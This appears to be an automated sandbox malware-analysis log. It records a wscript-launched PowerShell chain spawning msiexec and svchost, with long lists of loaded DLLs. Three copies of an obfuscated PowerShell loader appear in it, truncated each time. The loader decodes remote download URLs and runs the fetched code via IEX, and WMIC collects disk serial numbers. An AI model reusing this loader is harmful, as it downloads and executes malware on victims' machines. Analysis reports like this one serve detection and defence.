                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShl
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShl
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShlJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
